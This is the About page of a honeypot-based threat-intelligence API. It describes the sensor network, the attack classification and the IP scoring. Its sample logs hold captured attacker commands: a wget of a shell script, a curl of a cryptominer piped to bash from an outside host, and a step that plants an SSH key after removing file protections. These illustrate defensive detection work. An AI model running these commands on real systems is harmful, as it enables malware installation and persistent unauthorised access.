sikkerapi@prod ~$
Why SikkerAPI|
Sikker-CLISikkerGuard
Honeypot DatabaseEmail LookupUsername LookupDetection CatalogSubnet CalculatorEncoder / Decoder
Prices
|
Fail2BanCSF FirewallNginxiptables / ipset
|
Blog
OverviewIP CheckBlacklistReportBulk ReportTAXII FeedSikker-CLIConfidence Score Algorithm
Top CountriesTop ASNsTop ProtocolsTop IPsSMTP Database
CIDR Range AlertsIP AlertsUsername AlertsEmail AlertsBlacklist Web-UIInstall SikkerGuard
|login|signup
Loading
SikkerAPI

Open source threat intelligence from a global honeypot sensor network. Real attacker behavior, not purchased feeds.

Product
PricingDocumentationReport an IPThreat MapSystem Status
Resources
BlogFAQAboutContactComparisons
Tools
Sikker-CLISikkerGuardDetection CatalogSession DatabaseTAXII Feed
Browse
Top CountriesTop ASNsTop ProtocolsTop IPsSMTP Wall of Fame
© 2026 SikkerAPI
TermsPrivacyRemove Me

About SikkerAPI

Threat intelligence built on SikkerNet, a distributed honeypot network that captures real attacker behavior across 17 protocols in real-time

01

From honeypot network to threat intelligence API

SikkerAPI started as SikkerNet, a private honeypot network built to study what attackers do after gaining access to a system. The sensors accept all credentials because the goal is observing post-authentication behavior: command execution, lateral movement, malware staging, persistence mechanisms, and data exfiltration.

SikkerNet grew into a global sensor fleet processing millions of events per day. We built an API around it to give security teams, developers, and researchers access to the same threat data. Every feature is available on the free tier. Paid plans expand capacity, not functionality.

02

SikkerNet: the sensor network

Each SikkerNet sensor is a custom honeypot application written in Kotlin that simultaneously emulates 17 network protocols: SSH, HTTP, FTP, SMTP, MySQL, PostgreSQL, MongoDB, Redis, Docker, Telnet, Elasticsearch, MSSQL, IMAP, SMB, RTSP, SIP, and RDP. Unlike low-interaction honeypots that only log connection attempts, our sensors accept all credentials and engage attackers in realistic post-authentication environments.

The SSH honeypot alone implements 105+ commands with full argument parsing, realistic output, and a virtual filesystem that persists across the session. Attackers run uname, whoami, nvidia-smi, curl, wget, docker ps, crontab and get convincing responses for each one. This captures real attack tooling, malware download URLs, and persistence mechanisms that low-interaction honeypots cannot observe.

$ sikker events --live --limit 6sessions →
14:23:01 SSH 185.220.101.34 AUTH_ATTEMPT root:admin123
14:23:01 SSH 185.220.101.34 COMMAND wget http://93.174.x.x/bins.sh
14:23:02 MYSQL 45.134.26.91 QUERY SELECT @@version
14:23:03 SMTP 192.241.207.11 MAIL_FROM <[email protected]>
14:23:03 DOCKER 162.142.125.8 API_CALL POST /containers/create
14:23:04 REDIS 89.248.165.52 COMMAND CONFIG SET dir /var/spool/cron

Every event is captured raw and uninterpreted. The sensor records exactly what the attacker did at the byte level. Analysis, scoring, and classification happen centrally after ingestion. Sensors are disposable: if one is compromised, it can be replaced in under a minute. Events are buffered locally and delivered with at-least-once guarantees, so nothing is dropped when the central infrastructure is temporarily unreachable.

03

Behavioral attack classification

Raw events from sensors are processed by our editorial engine, which decomposes attack activity into two layers. Primitives are atomic indicators: a specific command, download URL, credential pattern, or SQL query matched by operators like EQUALS, CONTAINS, WILDCARD, or REGEX. Behaviors are composite attack classifications built from multiple primitives using AND/OR logic, each mapped to MITRE ATT&CK techniques with a severity level.

$ sikker session --view a3f7c2
# SSH session from 185.220.101.34 | duration: 14s
root@gpu-node-04:~# uname -a
Linux gpu-node-04 5.15.0-91-generic x86_64 GNU/Linux
root@gpu-node-04:~# nvidia-smi
NVIDIA-SMI 535.129.03 | CUDA 12.2 | Tesla T4 15360MiB
root@gpu-node-04:~# curl -s http://93.174.x.x/xmrig | bash
root@gpu-node-04:~# chattr -i /root/.ssh/authorized_keys
root@gpu-node-04:~# echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys

Each session is matched against exactly one behavior through exact set matching: every primitive in the session must be accounted for by the behavior definition, with no extras. An IP accumulates multiple behaviors across separate sessions. The editorial engine tracks a growing catalog of behaviors and primitives across SSH, Telnet, SIP, HTTP, and other protocols. The full catalog is browsable on the threat catalog page.

$ sikker behaviors 185.220.101.34catalog →
[CRITICAL]ssh_host_fingerprint_and_shell_rc_immutable_removal672,841
Execution of a multi-command host fingerprinting script that collects kernel details, architecture, uptime, CPU count and model, GPU information, login history, and binary help characteristics, combined with chattr -i to remove the immutable attribute from user shell initialization files
[CRITICAL]ssh_authorized_keys_persistence_established199,412
Removal of filesystem attribute protections from the user's .ssh directory followed by deletion and recreation of the directory and insertion of a new public key into authorized_keys
[HIGH]dual_source_gpu_validation_with_host_context34,219
Combined execution of lspci (VGA and 3D controller extraction) and nvidia-smi -q (product name extraction), together with kernel/architecture and uptime collection to cross-validate GPU presence using both PCI-level and NVIDIA driver-level queries
04

Confidence scoring & community reports

Every observed IP address receives a confidence level from 0 to 100 derived from two evidence sources. Sensor evidence weighs behavior severity, primitive matches, protocol diversity, and session volume. Community evidence weighs individual reports and bulk submissions from defenders, factoring in unique reporter count, report volume, and category severity. When both sources corroborate on the same IP, a multiplier boosts the final score.

$ sikker check 185.220.101.34API docs →
185.220.101.34 Confidence: 75 Last seen: 4d ago
Location: DE — Brandenburg — AS60729 (Stiftung Erneuerbare Freiheit)
Flags: TOR
Sessions: 14 across 2 protocol(s)
Protocols: POSTGRES (11) · SSH (3)
Behaviors: postgres_copy_from_program_execution_chain (very_high, 1)
Primitives: postgres_drop_table (1) · sql_transaction_begin (1) · postgres_drop_table_if_exists (1) · postgres_select_table_contents (1) · postgres_create_table_cmd_output (1) · postgres_version_probe_lowercase (1) · postgres_copy_from_program_background_execution (1)

Scores are evidence-based and transparent. You can inspect the exact behaviors, primitives, session counts, and community reports behind every score. The scoring methodology is documented. Known-benign scanners like Googlebot and Censys are discounted, with an override parameter to view the raw undiscounted score.

05

Built for integration

The IP Check API returns confidence levels, geolocation, behavioral classifications, protocol breakdowns, and community report data in a single request. The blacklist endpoint generates filtered IP lists by country, ASN, protocol, severity, and confidence threshold. Bulk reporting handles up to 10,000 IPs per request. STIX/TAXII 2.1 feeds are compatible with Splunk, Microsoft Sentinel, Elastic Security, and QRadar.

SikkerGuard is our server firewall application that pulls threat data from the API and blocks malicious IPs at the kernel level using iptables/ipset on Linux and Windows Firewall on Windows. Blocked connections are reported back to improve the dataset. Integration guides are also available for Fail2Ban, CSF, nginx, and iptables. The CLI tool queries IP reputation and downloads blocklists from the terminal.

SikkerAPI is founder-built and independent. Students, university researchers, and contributing security professionals get free access. No credit card required. Create a free account or read the API documentation.